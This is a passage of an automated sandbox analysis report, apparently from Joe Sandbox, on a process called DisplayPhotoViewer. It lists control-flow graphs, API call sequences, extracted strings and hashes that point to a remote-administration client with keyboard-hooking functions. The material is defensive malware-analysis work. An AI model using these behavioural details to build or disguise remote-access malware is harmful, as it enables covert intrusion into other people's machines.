1102c9c3-1102c9cb 1059->1067 1060->1061 1061->1042 1061->1064 1077 1102cc32-1102cc3a 1062->1077 1078 1102cc0c-1102cc12 1062->1078 1072 1102ca00-1102ca15 call 110b24c0 call 110286d0 1064->1072 1073 1102ca17-1102ca2a call 1107d140 1064->1073 1065->1027 1067->1046 1067->1060 1099 1102ca73-1102ca8c call 1107d140 1072->1099 1089 1102ca51-1102ca53 1073->1089 1090 1102ca2c-1102ca4f 1073->1090 1081 1102cc4c-1102ccd8 call 11157121 * 2 call 1113c600 * 2 GetCurrentProcessId call 110e6d30 call 11026940 call 1113c600 call 11157561 1077->1081 1082 1102cc3c-1102cc49 call 1100aa50 call 11157121 1077->1082 1078->1077 1080 1102cc14-1102cc2d call 1102bc80 1078->1080 1080->1077 1082->1081 1097 1102ca60-1102ca71 1089->1097 1090->1099 1101 1102c8de-1102c8ea 1091->1101 1114 1102c89f-1102c8a8 1091->1114 1092->1101 1097->1097 1097->1099 1116 1102ca92-1102cb0d call 1113c600 call 110c8dd0 call 110ca5e0 call 110b24c0 wsprintfA call 110b24c0 wsprintfA 1099->1116 1117 1102cbcc-1102cbd9 call 111592d0 1099->1117 1105 1102c8ec-1102c8f8 1101->1105 1106 1102c92d-1102c93c 1101->1106 1111 1102c90a-1102c90e 1105->1111 1112 1102c8fa-1102c908 GetProcAddress 1105->1112 1106->1028 1115 1102c93e-1102c93f FreeLibrary 1106->1115 1119 1102c910-1102c913 1111->1119 1120 1102c91f-1102c921 SetLastError 1111->1120 1112->1111 1114->1101 1118 1102c8aa-1102c8c2 call 11123400 1114->1118 1115->1028 1152 1102cb23-1102cb39 call 11121050 1116->1152 1153 1102cb0f-1102cb1e call 11027f50 1116->1153 1134 1102cbdc-1102cbe1 CharUpperA 1117->1134 1118->1101 1132 1102c8c4-1102c8d9 call 11026630 1118->1132 1124 1102c927 1119->1124 1120->1124 1124->1106 1132->1101 1134->1062 1157 1102cb52-1102cb8c call 110c9d30 * 2 1152->1157 1158 1102cb3b-1102cb4d call 110c9d30 1152->1158 1153->1152 1165 1102cba2-1102cbca call 111592d0 call 110c9920 1157->1165 1166 1102cb8e-1102cb9d call 11027f50 1157->1166 1158->1157 1165->1134 1166->1165
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: _malloc_memsetwsprintf
                                                                                                    • String ID: $$session$$%02d$%s.%02d$%session%$%sessionname%$22/01/15 11:35:42 V12.01F14$910646$Client$ClientName$DisableConsoleClient$Error x%x reading %s, sesh=%d$IsA()$ListenPort$MacAddress$NSM.LIC$NSMWClass$TCPIP$TSMode$WTSFreeMemory$WTSQuerySessionInformationA$Warning: Unexpanded clientname=<%s>$Wtsapi32.dll$client32$client32 dbi %hs$client32.ini$computername=%s, clientname=%s, tsmode=%d, vui=%d, vsvc=%d$e:\nsmsrc\nsm\1201\1201f2\ctl32\NSMString.h$multipoint=%d, softxpand=%d, pid=%d$screenscrape
                                                                                                    • API String ID: 3802068140-1962935003
                                                                                                    • Opcode ID: 32b016c17fafd803046ec645f98191fb1e3e94216ee79620eb962271b9480f34
                                                                                                    • Instruction ID: 9d0f9820ae9125632e92551a5da56ecdebc7d9da3861688bc661f885029e80f6
                                                                                                    • Opcode Fuzzy Hash: 32b016c17fafd803046ec645f98191fb1e3e94216ee79620eb962271b9480f34
                                                                                                    • Instruction Fuzzy Hash: 6432D5B5E002659FDB12DFD4CD84BEDB7B9BB45308F9041E9E518A7240EB706A84CF61
                                                                                                    Function 111398E0 Relevance: 66.6, APIs: 20, Strings: 18, Instructions: 134libraryloaderCOMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 1582 111398e0-11139921 GetModuleFileNameA 1583 11139963 1582->1583 1584 11139923-11139936 call 1107d210 1582->1584 1586 11139969-1113996d 1583->1586 1584->1583 1592 11139938-11139961 LoadLibraryA 1584->1592 1588 11139989-111399a7 GetModuleHandleA GetProcAddress 1586->1588 1589 1113996f-1113997c LoadLibraryA 1586->1589 1590 111399b7-111399e0 GetProcAddress * 4 1588->1590 1591 111399a9-111399b5 1588->1591 1589->1588 1593 1113997e-11139986 LoadLibraryA 1589->1593 1594 111399e3-11139a5b GetProcAddress * 10 call 11157561 1590->1594 1591->1594 1592->1586 1593->1588 1596 11139a60-11139a63 1594->1596
                                                                                                    APIs
                                                                                                    • GetModuleFileNameA.KERNEL32(00000000,?,00000104,00000000,8504C483,74DF23A0), ref: 11139913
                                                                                                    • LoadLibraryA.KERNEL32(?), ref: 1113995C
                                                                                                    • LoadLibraryA.KERNEL32(DBGHELP.DLL), ref: 11139975
                                                                                                    • LoadLibraryA.KERNEL32(IMAGEHLP.DLL), ref: 11139984
                                                                                                    • GetModuleHandleA.KERNEL32(?), ref: 1113998A
                                                                                                    • GetProcAddress.KERNEL32(00000000,SymGetLineFromAddr), ref: 1113999E
                                                                                                    • GetProcAddress.KERNEL32(00000000,SymGetLineFromName), ref: 111399BD
                                                                                                    • GetProcAddress.KERNEL32(00000000,SymGetLineNext), ref: 111399C8
                                                                                                    • GetProcAddress.KERNEL32(00000000,SymGetLinePrev), ref: 111399D3
                                                                                                    • GetProcAddress.KERNEL32(00000000,SymMatchFileName), ref: 111399DE
                                                                                                    • GetProcAddress.KERNEL32(00000000,StackWalk), ref: 111399E9
                                                                                                    • GetProcAddress.KERNEL32(00000000,SymCleanup), ref: 111399F4
                                                                                                    • GetProcAddress.KERNEL32(00000000,SymLoadModule), ref: 111399FF
                                                                                                    • GetProcAddress.KERNEL32(00000000,SymInitialize), ref: 11139A0A
                                                                                                    • GetProcAddress.KERNEL32(00000000,SymGetOptions), ref: 11139A15
                                                                                                    • GetProcAddress.KERNEL32(00000000,SymSetOptions), ref: 11139A20
                                                                                                    • GetProcAddress.KERNEL32(00000000,SymGetModuleInfo), ref: 11139A2B
                                                                                                    • GetProcAddress.KERNEL32(00000000,SymGetSymFromAddr), ref: 11139A36
                                                                                                    • GetProcAddress.KERNEL32(00000000,SymFunctionTableAccess), ref: 11139A41
                                                                                                    • GetProcAddress.KERNEL32(00000000,MiniDumpWriteDump), ref: 11139A4C
                                                                                                      • Part of subcall function 1107D210: _strrchr.LIBCMT ref: 1107D21E
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: AddressProc$LibraryLoad$Module$FileHandleName_strrchr
                                                                                                    • String ID: DBGHELP.DLL$IMAGEHLP.DLL$MiniDumpWriteDump$StackWalk$SymCleanup$SymFunctionTableAccess$SymGetLineFromAddr$SymGetLineFromName$SymGetLineNext$SymGetLinePrev$SymGetModuleInfo$SymGetOptions$SymGetSymFromAddr$SymInitialize$SymLoadModule$SymMatchFileName$SymSetOptions$dbghelp.dll
                                                                                                    • API String ID: 3874234733-2061581830
                                                                                                    • Opcode ID: c8b8452fb1aa39392f7c32dca87b05254262ac244c9aeb6417cce8801429317e
                                                                                                    • Instruction ID: 72695cc98cb7bd1bdbc63c8529ea0cb43d233fb0b8bc91a633ad458cd3541f52
                                                                                                    • Opcode Fuzzy Hash: c8b8452fb1aa39392f7c32dca87b05254262ac244c9aeb6417cce8801429317e
                                                                                                    • Instruction Fuzzy Hash: 58415C74A00746AFD7209F36AC94E6BFAF8EF95714B00492EE485D3684EB74EC40CB59
                                                                                                    Function 11137810 Relevance: 56.3, APIs: 14, Strings: 18, Instructions: 275libraryloaderregistryCOMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 1597 11137810-11137857 call 1113c600 1600 111378c7-111378f1 call 111391f0 call 1113ce00 LoadLibraryA 1597->1600 1601 11137859-11137879 call 11059e50 1597->1601 1610 111378f3-111378f9 1600->1610 1611 11137926-1113792b 1600->1611 1601->1600 1607 1113787b-11137894 call 11015b30 1601->1607 1614 11137896-111378a7 GetProcAddress 1607->1614 1615 111378a9-111378ab 1607->1615 1610->1611 1613 111378fb-11137901 1610->1613 1616 11137931-11137951 GetClassInfoExA 1611->1616 1613->1611 1619 11137903-11137924 call 11059e50 1613->1619 1614->1615 1620 111378ad-111378af SetLastError 1614->1620 1623 111378b5-111378be 1615->1623 1617 111379f2-11137a45 1616->1617 1618 11137957-1113797e call 11157580 call 1113a820 1616->1618 1632 11137a81-11137a87 1617->1632 1633 11137a47-11137a4d 1617->1633 1634 11137980-11137994 call 11027f50 1618->1634 1635 11137997-111379d9 call 1113a820 call 1113a850 LoadCursorA GetStockObject RegisterClassExA 1618->1635 1619->1616 1620->1623 1623->1600 1627 111378c0-111378c1 FreeLibrary 1623->1627 1627->1600 1639 11137ac3-11137ae5 call 11059e50 1632->1639 1640 11137a89-11137a8e call 111077a0 1632->1640 1633->1632 1636 11137a4f-11137a55 1633->1636 1634->1635 1635->1617 1660 111379db-111379ef call 11027f50 1635->1660 1636->1632 1642 11137a57-11137a6e call 11124940 LoadLibraryA 1636->1642 1650 11137af3-11137af8 1639->1650 1651 11137ae7-11137af1 1639->1651 1649 11137a93-11137a98 1640->1649 1642->1632 1659 11137a70-11137a7c GetProcAddress 1642->1659 1654 11137a9a-11137aba 1649->1654 1655 11137abc 1649->1655 1657 11137b04-11137b0a 1650->1657 1658 11137afa 1650->1658 1651->1657 1656 11137abe 1654->1656 1655->1656 1656->1639 1661 11137b17-11137b31 call 11133940 1657->1661 1662 11137b0c-11137b12 call 110f0a50 1657->1662 1658->1657 1659->1632 1660->1617 1669 11137b37-11137b3d 1661->1669 1670 11137bcc-11137bd3 call 1112be70 1661->1670 1662->1661 1671 11137b79-11137b7f 1669->1671 1672 11137b3f-11137b51 call 111077a0 1669->1672 1679 11137c07-11137c18 1670->1679 1680 11137bd5-11137c04 call 1113c600 call 11143b50 call 11143840 call 1113c600 1670->1680 1676 11137b81-11137b93 SetTimer 1671->1676 1677 11137b98-11137ba4 1671->1677 1683 11137b53-11137b69 call 11152f60 1672->1683 1684 11137b6b 1672->1684 1676->1677 1681 11137ba6-11137bac 1677->1681 1682 11137bbb-11137bc6 #17 LoadLibraryA 1677->1682 1680->1679 1681->1682 1686 11137bae-11137bb4 1681->1686 1682->1670 1689 11137b6d-11137b74 1683->1689 1684->1689 1686->1682 1690 11137bb6 call 11125750 1686->1690 1689->1671 1690->1682
                                                                                                    APIs
                                                                                                    • GetProcAddress.KERNEL32(00000000,SetProcessDPIAware), ref: 1113789C
                                                                                                    • SetLastError.KERNEL32(00000078), ref: 111378AF
                                                                                                    • FreeLibrary.KERNEL32(00000000), ref: 111378C1
                                                                                                    • LoadLibraryA.KERNEL32(imm32,?,?,00000000,00000000), ref: 111378E4
                                                                                                    • GetClassInfoExA.USER32(11000000,NSMWClass,?), ref: 11137949
                                                                                                    • _memset.LIBCMT ref: 1113795D
                                                                                                    • LoadCursorA.USER32(00000000,00007F00), ref: 111379AD
                                                                                                    • GetStockObject.GDI32(00000000), ref: 111379B7
                                                                                                    • LoadLibraryA.KERNEL32(pcihooks,?,?,00000000,00000000), ref: 11137A61
                                                                                                    • GetProcAddress.KERNEL32(00000000,HookKeyboard), ref: 11137A76
                                                                                                    • RegisterClassExA.USER32(?), ref: 111379CE
                                                                                                      • Part of subcall function 11059E50: __wcstoi64.LIBCMT ref: 11059E8D
                                                                                                    • SetTimer.USER32(00000000,00000000,000003E8,11133920), ref: 11137B8D
                                                                                                    • #17.COMCTL32(?,?,?,00000000,00000000), ref: 11137BBB
                                                                                                    • LoadLibraryA.KERNEL32(riched32.dll,?,?,?,00000000,00000000), ref: 11137BC6
                                                                                                      • Part of subcall function 11015B30: LoadLibraryA.KERNEL32(User32.dll,?,1111ACB9,?), ref: 11015B38
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: LibraryLoad$AddressClassProc$CursorErrorFreeInfoLastObjectRegisterStockTimer__wcstoi64_memset
                                                                                                    • String ID: *quiet$Client$DisableDPIAware$HookKeyboard$InitUI (%d)$Inited VolumeControl.$Initing VolumeControl...$NSMGetAppIcon()$NSMWClass$SetProcessDPIAware$TraceCopyData$UI.CPP$View$_License$_debug$imm32$pcihooks$riched32.dll
                                                                                                    • API String ID: 2794364348-1856305019
                                                                                                    • Opcode ID: a48d454bdf71ff868c082bc9fb9ec1c22c64ddfdeb366ff215b079103459fa0c
                                                                                                    • Instruction ID: 5383d1c45941e586ec3322f8babb158b38f1c475c46f5439c7b0799b605407ca
                                                                                                    • Opcode Fuzzy Hash: a48d454bdf71ff868c082bc9fb9ec1c22c64ddfdeb366ff215b079103459fa0c
                                                                                                    • Instruction Fuzzy Hash: 40A1D1B4A01666AFDB02DFE1DDC4A6DFBB4FB8431EF104179E52597248EB306940CB61
                                                                                                    Function 110A4800 Relevance: 56.2, APIs: 27, Strings: 5, Instructions: 236libraryloaderCOMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 1699 110a4800-110a4862 LoadLibraryA GetProcAddress 1700 110a4868-110a4879 SetupDiGetClassDevsA 1699->1700 1701 110a4975-110a497d SetLastError 1699->1701 1702 110a487f-110a488d 1700->1702 1703 110a4a83-110a4a85 1700->1703 1707 110a4989-110a498b SetLastError 1701->1707 1704 110a4890-110a4894 1702->1704 1705 110a4a8e-110a4a90 1703->1705 1706 110a4a87-110a4a88 FreeLibrary 1703->1706 1708 110a48ad-110a48c5 1704->1708 1709 110a4896-110a48a7 GetProcAddress 1704->1709 1710 110a4aa7-110a4ac2 call 11157561 1705->1710 1706->1705 1711 110a4991-110a499c GetLastError 1707->1711 1708->1711 1720 110a48cb-110a48cd 1708->1720 1709->1707 1709->1708 1713 110a49a2-110a49ad _free 1711->1713 1714 110a4a30-110a4a41 GetProcAddress 1711->1714 1713->1704 1715 110a4a4b-110a4a4d SetLastError 1714->1715 1716 110a4a43-110a4a49 SetupDiDestroyDeviceInfoList 1714->1716 1719 110a4a53-110a4a55 1715->1719 1716->1719 1719->1703 1721 110a4a57-110a4a79 CreateFileA 1719->1721 1722 110a48d8-110a48da 1720->1722 1723 110a48cf-110a48d5 _free 1720->1723 1724 110a4a7b-110a4a80 _free 1721->1724 1725 110a4a92-110a4a9c _free 1721->1725 1726 110a48dc-110a48ef GetProcAddress 1722->1726 1727 110a48f5-110a490b 1722->1727 1723->1722 1724->1703 1728 110a4a9e-110a4a9f FreeLibrary 1725->1728 1729 110a4aa5 1725->1729 1726->1727 1730 110a49b2-110a49ba SetLastError 1726->1730 1732 110a490d-110a4916 GetLastError 1727->1732 1733 110a491c-110a492f call 111583b1 1727->1733 1728->1729 1729->1710 1730->1732 1732->1733 1734 110a49f1-110a4a02 call 110a47a0 1732->1734 1739 110a4a12-110a4a23 call 110a47a0 1733->1739 1740 110a4935-110a493d 1733->1740 1741 110a4a0b-110a4a0d 1734->1741 1742 110a4a04-110a4a05 FreeLibrary 1734->1742 1739->1741 1750 110a4a25-110a4a2e FreeLibrary 1739->1750 1743 110a493f-110a4952 GetProcAddress 1740->1743 1744 110a4954-110a496b 1740->1744 1741->1710 1742->1741 1743->1744 1746 110a49bf-110a49c1 SetLastError 1743->1746 1748 110a49c7-110a49e1 call 110a47a0 _free 1744->1748 1752 110a496d-110a4970 1744->1752 1746->1748 1748->1741 1754 110a49e3-110a49ec FreeLibrary 1748->1754 1750->1710 1752->1704 1754->1710
                                                                                                    APIs
                                                                                                    • LoadLibraryA.KERNEL32(setupapi.dll,218EC38C,?,00000000,00000000,?,?,?,?,?,?,?,?,?,00000000,11179BD8), ref: 110A4833
                                                                                                    • GetProcAddress.KERNEL32(00000000,SetupDiGetClassDevsA), ref: 110A4857
                                                                                                    • SetupDiGetClassDevsA.SETUPAPI(1119B5A4,00000000,00000000,00000012,?,?,?,?,?,?,?,?,?,00000000,11179BD8,000000FF), ref: 110A4871
                                                                                                    • GetProcAddress.KERNEL32(00000000,SetupDiEnumDeviceInterfaces), ref: 110A489C
                                                                                                    • _free.LIBCMT ref: 110A48D0
                                                                                                    • GetProcAddress.KERNEL32(00000000,SetupDiGetDeviceInterfaceDetailA), ref: 110A48E2
                                                                                                    • GetLastError.KERNEL32 ref: 110A490D
                                                                                                    • _malloc.LIBCMT ref: 110A4923
                                                                                                    • GetProcAddress.KERNEL32(00000000,SetupDiGetDeviceInterfaceDetailA), ref: 110A4945
                                                                                                    • SetLastError.KERNEL32(00000078,?,?,?,?,?,?,?,?,?,00000000,11179BD8,000000FF,?,1102D996,Client), ref: 110A4977
                                                                                                    • SetLastError.KERNEL32(00000078), ref: 110A498B
                                                                                                    • GetLastError.KERNEL32 ref: 110A4991
                                                                                                    • _free.LIBCMT ref: 110A49A3
                                                                                                    • SetLastError.KERNEL32(00000078), ref: 110A49B4
                                                                                                    • SetLastError.KERNEL32(00000078), ref: 110A49C1
                                                                                                    • _free.LIBCMT ref: 110A49D4
                                                                                                    • FreeLibrary.KERNEL32(?,?), ref: 110A49E4
                                                                                                    • FreeLibrary.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,00000000,11179BD8,000000FF,?,1102D996,Client), ref: 110A4A88
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: ErrorLast$AddressProc$Library_free$Free$ClassDevsLoadSetup_malloc
                                                                                                    • String ID: SetupDiDestroyDeviceInfoList$SetupDiEnumDeviceInterfaces$SetupDiGetClassDevsA$SetupDiGetDeviceInterfaceDetailA$setupapi.dll
                                                                                                    • API String ID: 3464732724-3340099623
                                                                                                    • Opcode ID: a8f04a4c0069a799c1017047b7692278921ba9829b5c2e38d79cabdb4f67ccb1
                                                                                                    • Instruction ID: 03757e0a7f98c06ecb1de961cf35583ab4dd38f54ff60b5ac3ec959765308ed9
                                                                                                    • Opcode Fuzzy Hash: a8f04a4c0069a799c1017047b7692278921ba9829b5c2e38d79cabdb4f67ccb1
                                                                                                    • Instruction Fuzzy Hash: A08194B9E40255ABEB01DFE5EC84FAEBBB8BF44704F164128F821E6284DB749505CB64
                                                                                                    Function 1000D010 Relevance: 47.6, APIs: 4, Strings: 23, Instructions: 364COMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 1755 1000d010-1000d02e 1756 1000d034-1000d075 call 10066b50 call 10273a9d 1755->1756 1757 1000d538-1000d53e 1755->1757 1756->1757 1763 1000d07b-1000d3ab call 1000ce70 * 37 1756->1763 1763->1757 1838 1000d3b1-1000d41b GetCurrentDirectoryW 1763->1838 1840 1000d420-1000d428 1838->1840 1841 1000d430-1000d43b 1840->1841 1841->1841 1842 1000d43d-1000d441 1841->1842 1843 1000d442-1000d44a 1842->1843 1843->1843 1844 1000d44c-1000d477 call 1028239a 1843->1844 1847 1000d514-1000d51d 1844->1847 1848 1000d47d-1000d488 1844->1848 1847->1840 1850 1000d523-1000d528 1847->1850 1849 1000d490-1000d49b 1848->1849 1849->1849 1851 1000d49d-1000d4fa call 10282410 LoadLibraryA call 102823a5 1849->1851 1850->1757 1852 1000d52a-1000d532 SetCurrentDirectoryW 1850->1852 1851->1847 1852->1757
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3127485200.0000000010001000.00000020.00000001.01000000.00000009.sdmp, Offset: 10000000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3127459389.0000000010000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3134028906.00000000102AC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3134028906.00000000102F0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3134028906.00000000102F5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3134028906.0000000010362000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3134028906.000000001036F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3134028906.0000000010371000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3134028906.000000001037F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3134028906.00000000103A5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3134028906.00000000103B1000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3134028906.00000000103B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3134028906.00000000103C1000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3134028906.00000000103E1000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3138272696.000000001041B000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3138452194.000000001045E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3138495106.000000001045F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3141998762.000000001059E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3142048918.00000000105A0000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3142110889.00000000105A4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3142150062.00000000105A5000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3142197001.00000000105A7000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3142253419.00000000105A9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3142293852.00000000105AB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_10000000_DisplayPhotoViewer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: *.fip$PBM$PBMRAW$PGM$PGMRAW$PPM$PPMRAW$Portable Bitmap (ASCII)$Portable Bitmap (RAW)$Portable Greymap (ASCII)$Portable Greymap (RAW)$Portable Pixelmap (ASCII)$Portable Pixelmap (RAW)$^P1$^P2$^P3$^P4$^P5$^P6$pbm$pgm$ppm$Dx
                                                                                                    • API String ID: 0-1275677358
                                                                                                    • Opcode ID: df55e91332bba54cd0aa446571f94493eb8ce250859a77f91e6f9663f57ed146
                                                                                                    • Instruction ID: b2b3ad046eabd30ceafa37f7010464ca4575cc57bc610209a677724c45f2eb30
                                                                                                    • Opcode Fuzzy Hash: df55e91332bba54cd0aa446571f94493eb8ce250859a77f91e6f9663f57ed146
                                                                                                    • Instruction Fuzzy Hash: 8D81B3382483CC67F315E7F0DC62FEF3656DB82684F80021AF5096F6C6DE66798446A6
                                                                                                    Function 110270F0 Relevance: 42.5, APIs: 2, Strings: 22, Instructions: 542COMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
